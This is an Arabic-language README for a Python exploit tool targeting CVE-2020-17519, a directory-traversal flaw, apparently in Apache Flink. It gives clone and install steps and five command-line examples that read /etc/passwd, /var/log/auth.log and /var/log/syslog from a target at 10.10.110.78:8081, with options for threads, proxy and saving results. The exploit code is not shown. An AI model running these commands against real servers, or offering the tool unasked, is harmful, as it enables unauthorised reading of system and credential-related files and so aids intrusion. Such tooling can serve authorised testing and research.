
أداة بلغة بايثون تستخدم تقنية اجتياز الدليل لطلب ملفات السجلات من عنوان URL مستهدف. تعرض التقدم في الوقت الفعلي، وتدعم إعداد البروكسي، وتحفظ الاستجابات الصالحة بشكل اختياري.
requests و pwntools (pwn)argparse, os, concurrent.futures, threadinggit clone https://github.com/GazettEl/CVE-2020-17519.git
pip install requests pwntools
يمكن تنفيذ الأداة من سطر الأوامر مع خيارات متنوعة. فيما يلي بعض الأمثلة:
المثال 1: طلب مسار ملف واحد
python CVE-2020-17519.py --target http://10.10.110.78:8081/ --depth 12 --file-path /var/log/syslog --threads 1 --save
المثال 2: طلب مسارات ملفات متعددة من قائمة
python CVE-2020-17519.py --target http://10.10.110.78:8081/ --depth 12 --file-list file_paths.txt --threads 4 --proxy none
المثال 3: التشغيل مع تعطيل البروكسي
python CVE-2020-17519.py --target http://10.10.110.78:8081/ --depth 10 --file-path /var/log/auth.log --threads 2 --proxy none
المثال 4: استخدام قائمة ملفات وحفظ الاستجابات الصالحة
python CVE-2020-17519.py --target http://10.10.110.78:8081/ --depth 15 --file-list paths.txt --threads 4 --save
المثال 5: طلب ملف واحد بعمق متزايد
python CVE-2020-17519.py --target http://10.10.110.78:8081/ --depth 20 --file-path /etc/passwd --threads 1
لمزيد من التفاصيل، راجع الكود المصدري والتعليقات المضمّنة.